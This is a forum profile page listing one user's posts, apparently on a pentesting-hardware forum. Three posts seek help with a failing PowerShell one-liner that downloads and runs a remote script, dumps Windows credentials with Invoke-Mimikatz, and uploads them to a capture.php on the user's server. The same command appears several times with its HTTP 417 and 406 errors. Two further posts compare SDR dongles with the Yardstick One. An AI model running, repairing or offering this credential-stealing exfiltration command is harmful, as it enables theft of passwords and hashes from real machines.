Jump to content

BrandonEckert

Active Members
  • Posts

    9
  • Joined

  • Last visited

Everything posted by BrandonEckert

  1. Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output: C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)" Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed." At line:1 char:204 + IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException
  2. Sorry, yes I did redact my domain. I added that and now receive the following. Any ideas?: o)" Exception calling "UploadString" with "2" argument(s): "The remote server retur ned an error: (406) Not Acceptable." At line:1 char:151 + IEX(New-Object Net.WebClient).DownloadString('http://<my domain>/im.ps 1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain>/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException
  3. Good evening, I have been trying to get this (as well as the original script) to successfully work to no avail. When I manually run the powershell command, I receive the following error. Any ideas? Exception calling "UploadString" with "2" argument(s): "The remote server retur ned an error: (417) Expectation Failed." At line:1 char:151 + IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps 1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString <<<< ('http://<my domain.com>/capture.php',$o) + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException
  4. Sounds good and great explanation. Does the SDR just receive and that is it? Anything I have seen has the yardstick as transmit/replay...and SDR seems to just be receiving?
  5. Good morning, I was wondering if the SDR starter kit dongle has any features that the Yardstick one doesn't have? i.e. If I get the Yardstick One, will I not be able to do certain things the SDR can like ADS-B?
×
×
  • Create New...